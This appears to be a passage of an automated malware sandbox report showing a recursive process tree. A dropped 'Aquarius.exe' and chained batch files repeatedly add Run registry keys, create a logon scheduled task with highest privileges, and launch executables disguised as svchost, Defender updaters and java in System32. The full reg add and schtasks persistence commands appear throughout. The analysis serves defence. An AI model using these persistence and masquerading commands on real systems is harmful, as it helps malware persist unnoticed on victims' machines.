- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe"C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe"3⤵
- Executes dropped EXE
PID:2768 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D53A.tmp\D53B.tmp\D53C.bat C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe"4⤵
- Loads dropped DLL
- Drops file in System32 directory
PID:2084 -
C:\Windows\system32\timeout.exetimeout 15⤵PID:2904
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f5⤵PID:1356
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f5⤵
- Adds Run key to start application
PID:1636
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f5⤵PID:2892
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f5⤵PID:2372
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"5⤵
- Executes dropped EXE
PID:776 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:756
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1412 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "WindowsDataUpdater" /sc ONLOGON /tr "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:1324
-
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"5⤵
- Executes dropped EXE
PID:1048 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D855.tmp\D856.tmp\D857.bat C:\Windows\system32\java.exe"6⤵
- Loads dropped DLL
- Drops file in System32 directory
PID:2348 -
C:\Windows\system32\timeout.exetimeout 17⤵PID:316
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f7⤵PID:2484
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f7⤵PID:1900
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f7⤵PID:2864
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f7⤵PID:2908
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"7⤵
- Executes dropped EXE
PID:2244 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1700
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:688
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"7⤵
- Executes dropped EXE
PID:1416 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DBFD.tmp\DBFE.tmp\DBFF.bat C:\Windows\system32\java.exe"8⤵
- Loads dropped DLL
PID:2268 -
C:\Windows\system32\timeout.exetimeout 19⤵PID:1356
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f9⤵PID:1976
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f9⤵PID:2808
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f9⤵PID:1948
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f9⤵
- Adds Run key to start application
PID:1500
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"9⤵
- Executes dropped EXE
PID:2028 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"10⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2660
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"9⤵
- Executes dropped EXE
PID:2216 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DFA5.tmp\DFA6.tmp\DFA7.bat C:\Windows\system32\java.exe"10⤵
- Loads dropped DLL
- Drops file in System32 directory
PID:1504 -
C:\Windows\system32\timeout.exetimeout 111⤵
- Delays execution with timeout.exe
PID:2800
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f11⤵PID:1760
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f11⤵PID:1652
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f11⤵PID:3060
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f11⤵PID:1944
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"11⤵
- Executes dropped EXE
PID:2372 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2924
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"11⤵
- Executes dropped EXE
PID:2932 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E3AB.tmp\E3AC.tmp\E3AD.bat C:\Windows\system32\java.exe"12⤵
- Loads dropped DLL
- Drops file in System32 directory
PID:1572 -
C:\Windows\system32\timeout.exetimeout 113⤵
- Delays execution with timeout.exe
PID:1984
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f13⤵
- Adds Run key to start application
PID:1268
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f13⤵PID:1544
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f13⤵PID:2544
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f13⤵PID:1532
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"13⤵
- Executes dropped EXE
PID:2092 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"14⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2284
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"13⤵
- Executes dropped EXE
PID:2480 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E782.tmp\E783.tmp\E784.bat C:\Windows\system32\java.exe"14⤵
- Loads dropped DLL
PID:764 -
C:\Windows\system32\timeout.exetimeout 115⤵PID:2468
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f15⤵
- Adds Run key to start application
PID:2020
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f15⤵PID:988
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f15⤵
- Adds Run key to start application
PID:2504
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f15⤵PID:1788
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"15⤵
- Executes dropped EXE
PID:2132 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"16⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1500
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"15⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3000
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"15⤵
- Executes dropped EXE
PID:1852 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EB58.tmp\EB59.tmp\EB5A.bat C:\Windows\system32\java.exe"16⤵
- Drops file in System32 directory
PID:2332 -
C:\Windows\system32\timeout.exetimeout 117⤵PID:1672
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f17⤵PID:1528
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f17⤵PID:392
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f17⤵PID:808
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f17⤵PID:1624
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"17⤵
- Executes dropped EXE
PID:1900 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"18⤵
- Executes dropped EXE
PID:2452
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"17⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"17⤵
- Executes dropped EXE
PID:1432 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EF10.tmp\EF11.tmp\EF12.bat C:\Windows\system32\java.exe"18⤵
- Drops file in System32 directory
PID:952 -
C:\Windows\system32\timeout.exetimeout 119⤵PID:928
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f19⤵PID:2904
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f19⤵PID:2160
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f19⤵PID:1980
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f19⤵
- Adds Run key to start application
PID:2784
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"19⤵
- Executes dropped EXE
PID:472 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"20⤵
- Executes dropped EXE
PID:1532
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"19⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2492
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"19⤵
- Executes dropped EXE
PID:1536 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F316.tmp\F317.tmp\F327.bat C:\Windows\system32\java.exe"20⤵
- Drops file in System32 directory
PID:1512 -
C:\Windows\system32\timeout.exetimeout 121⤵
- Delays execution with timeout.exe
PID:2692
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f21⤵PID:924
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f21⤵
- Adds Run key to start application
PID:1684
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f21⤵PID:2696
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f21⤵PID:2748
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"21⤵
- Executes dropped EXE
PID:1760 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"22⤵
- Executes dropped EXE
PID:2020
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"21⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"21⤵
- Executes dropped EXE
PID:2308 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F71B.tmp\F71C.tmp\F71D.bat C:\Windows\system32\java.exe"22⤵
- Drops file in System32 directory
PID:1936 -
C:\Windows\system32\timeout.exetimeout 123⤵PID:2012
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f23⤵PID:908
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f23⤵PID:2880
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f23⤵PID:2572
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f23⤵PID:2692
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"23⤵
- Executes dropped EXE
PID:924 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"24⤵
- Executes dropped EXE
PID:1960
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"23⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"23⤵
- Executes dropped EXE
PID:2696 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FAD3.tmp\FAD4.tmp\FAD5.bat C:\Windows\system32\java.exe"24⤵
- Drops file in System32 directory
PID:1864 -
C:\Windows\system32\timeout.exetimeout 125⤵PID:1228
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f25⤵PID:2524
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f25⤵PID:316
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f25⤵
- Adds Run key to start application
PID:2676
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f25⤵PID:2616
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"25⤵
- Executes dropped EXE
PID:1268 -
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"26⤵
- Executes dropped EXE
PID:2500
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"25⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3000
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"25⤵
- Executes dropped EXE
PID:1680 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FEE8.tmp\FEE9.tmp\FEEA.bat C:\Windows\system32\java.exe"26⤵
- Drops file in System32 directory
PID:2804 -
C:\Windows\system32\timeout.exetimeout 127⤵
- Delays execution with timeout.exe
PID:2584
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f27⤵PID:2016
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f27⤵PID:1480
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f27⤵PID:2576
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f27⤵
- Adds Run key to start application
PID:2608
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"27⤵PID:2412
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"28⤵PID:2840
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"27⤵
- Suspicious use of AdjustPrivilegeToken
PID:932
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"27⤵PID:3012
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2AF.tmp\2B0.tmp\2B1.bat C:\Windows\system32\java.exe"28⤵
- Drops file in System32 directory
PID:808 -
C:\Windows\system32\timeout.exetimeout 129⤵PID:2496
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f29⤵PID:2800
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f29⤵
- Adds Run key to start application
PID:392
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f29⤵PID:2940
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f29⤵PID:1840
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"29⤵PID:1860
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"30⤵PID:2612
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"29⤵
- Suspicious use of AdjustPrivilegeToken
PID:1924
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"29⤵PID:1672
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\732.tmp\733.tmp\734.bat C:\Windows\system32\java.exe"30⤵
- Drops file in System32 directory
PID:2616 -
C:\Windows\system32\timeout.exetimeout 131⤵
- Delays execution with timeout.exe
PID:2480
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f31⤵PID:348
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f31⤵PID:1560
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f31⤵PID:1144
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f31⤵PID:952
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"31⤵PID:2740
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"32⤵PID:2216
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"31⤵
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"31⤵PID:1616
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AF9.tmp\AFA.tmp\AFB.bat C:\Windows\system32\java.exe"32⤵
- Drops file in System32 directory
PID:3000 -
C:\Windows\system32\timeout.exetimeout 133⤵
- Delays execution with timeout.exe
PID:1300
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f33⤵PID:2128
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f33⤵
- Adds Run key to start application
PID:1560
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f33⤵PID:2744
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f33⤵PID:2728
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"33⤵PID:1716
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"34⤵PID:1772
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"33⤵
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"33⤵PID:1948
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E91.tmp\E92.tmp\E93.bat C:\Windows\system32\java.exe"34⤵
- Drops file in System32 directory
PID:588 -
C:\Windows\system32\timeout.exetimeout 135⤵PID:2932
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f35⤵PID:2880
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f35⤵PID:3032
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f35⤵PID:928
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f35⤵
- Adds Run key to start application
PID:2552
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"35⤵PID:2496
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"36⤵PID:2036
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"35⤵
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"35⤵PID:1932
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1297.tmp\1298.tmp\1299.bat C:\Windows\system32\java.exe"36⤵
- Drops file in System32 directory
